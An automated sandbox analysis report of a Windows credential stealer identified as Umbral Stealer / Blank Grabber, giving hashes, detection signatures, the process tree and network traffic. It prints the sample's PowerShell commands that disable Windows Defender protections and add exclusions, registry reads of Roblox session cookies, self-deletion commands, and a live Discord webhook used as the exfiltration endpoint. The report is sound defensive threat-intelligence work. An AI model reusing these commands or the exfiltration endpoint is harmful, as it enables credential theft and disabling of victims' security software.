Edit tour

Windows Analysis Report
WE8zqotCFj.exe

Overview

General Information

Sample name:	WE8zqotCFj.exe renamed because original name is a hash value
Original sample name:	230f75b72d5021a921637929a63cfd79.exe
Analysis ID:	1574305
MD5:	230f75b72d5021a921637929a63cfd79
SHA1:	71af2ee3489d49914f7c7fa4e16e8398e97e0fc8
SHA256:	a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355
Tags:	exeuser-abuse_ch
Infos:

Detection

Blank Grabber, Umbral Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Umbral Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies the hosts file

Self deletion via cmd or bat file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses attrib.exe to hide files

Uses ping.exe to check the status of other devices and networks

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

WE8zqotCFj.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\WE8zqotCFj.exe" MD5: 230F75B72D5021A921637929A63CFD79)

attrib.exe (PID: 8076 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8128 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7412 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7696 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2820 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7708 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2988 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3892 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1760 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2188 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5508 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4580 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 4464 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp", "Version": "v1.3"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
WE8zqotCFj.exe	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
WE8zqotCFj.exe	JoeSecurity_UmbralStealer	Yara detected Umbral Stealer	Joe Security
WE8zqotCFj.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x31f24:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x320aa:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x32146:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_UmbralStealer	Yara detected Umbral Stealer	Joe Security
Process Memory Space: WE8zqotCFj.exe PID: 7912	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: WE8zqotCFj.exe PID: 7912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WE8zqotCFj.exe PID: 7912	JoeSecurity_UmbralStealer	Yara detected Umbral Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.WE8zqotCFj.exe.23284ad0000.0.unpack	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0.0.WE8zqotCFj.exe.23284ad0000.0.unpack	JoeSecurity_UmbralStealer	Yara detected Umbral Stealer	Joe Security
0.0.WE8zqotCFj.exe.23284ad0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x31f24:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x320aa:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x32146:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WE8zqotCFj.exe", ParentImage: C:\Users\user\Desktop\WE8zqotCFj.exe, ParentProcessId: 7912, ParentProcessName: WE8zqotCFj.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', ProcessId: 8128, ProcessName: powershell.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WE8zqotCFj.exe", ParentImage: C:\Users\user\Desktop\WE8zqotCFj.exe, ParentProcessId: 7912, ParentProcessName: WE8zqotCFj.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7696, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WE8zqotCFj.exe", ParentImage: C:\Users\user\Desktop\WE8zqotCFj.exe, ParentProcessId: 7912, ParentProcessName: WE8zqotCFj.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe', ProcessId: 8128, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T08:21:26.482838+0100	2045593	1	A Network Trojan was detected	192.168.2.9	49850	162.159.137.232	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WE8zqotCFj.exe

Avira: detected

Found malware configuration

Source: WE8zqotCFj.exe

Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp", "Version": "v1.3"}

Multi AV Scanner detection for submitted file

Source: WE8zqotCFj.exe	ReversingLabs: Detection: 78%
Source: WE8zqotCFj.exe	Virustotal: Detection: 83%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for sample

Source: WE8zqotCFj.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Code function: 0_2_00007FF887EB212F CryptUnprotectData,

0_2_00007FF887EB212F

Source: WE8zqotCFj.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49850 version: TLS 1.2

Source: WE8zqotCFj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.9:49850 -> 162.159.137.232:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.137.232 162.159.137.232

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 939Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:21:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734074488x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qd901rok5pq1%2FqlVJSmkbnqQoPljg%2Fy6gpfO8CVyHFI3Cmrt8PhQj91kNnwSK2iUm6y3QlUUoTiwQmjAZS3F%2B%2BBEFWcr%2B1VFcha6NkJ0Wgs72sMzjv%2FqY0wcGBsS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=f2c51aace90cd5ef200eb0cbd75b25f5896e9851-1734074486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=0RdJOmw_l5HeUpV08T_r8JL5MMdeyT5ka_7t3zw0K6w-1734074486630-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f14328389f86a52-EWR{"message": "Unknown Webhook", "code": 10015}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:21:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734074491x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71WWOKyFWi8dM%2BSRPpRycuDklRvFTxk3IaUr6xzNk%2BNznuC0KDWJE9GUwKgTjFjHgnwzhGaUxM%2BEqTfzdDuG3VmlOVUPmy0ueN8FvsStl7fQcXtd7TdqGBbVtF2j"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8f14328fcb168c89-EWR{"message": "Unknown Webhook", "code": 10015}

Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328724C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fiel0
Source: WE8zqotCFj.exe	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: WE8zqotCFj.exe	String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000004.00000002.1437994638.000001A4E8066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A64A26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A648E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A56138000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E192C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205F0125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205EFFEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1416423096.000001A4D8218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1416423096.000001A4D7FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A54871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205DFF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A0B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1416423096.000001A4D8218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1416423096.000001A4D7FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6C9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458314826.00000277A6C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A54871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205DFF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A0B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: WE8zqotCFj.exe	String found in binary or memory: https://discord.com/api/v10/users/
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwe
Source: WE8zqotCFj.exe	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Umbral-Ste
Source: WE8zqotCFj.exe	String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: powershell.exe, 00000014.00000002.1775683459.00000255A23B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com
Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023286A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: WE8zqotCFj.exe	String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: powershell.exe, 00000004.00000002.1437994638.000001A4E8066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A64A26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563508983.0000021A648E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1502244276.0000021A56138000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E192C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205F0125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1687687798.00000205EFFEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0BED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1903240259.00000255B0D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1502244276.0000021A56067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1591578432.00000205E1709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1775683459.00000255A2010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856

Source: unknown

HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49850 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: WE8zqotCFj.exe, type: SAMPLE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D070D0	0_2_00007FF887D070D0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF6888	0_2_00007FF887CF6888
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFC8B2	0_2_00007FF887CFC8B2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D07048	0_2_00007FF887D07048
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFFF88	0_2_00007FF887CFFF88
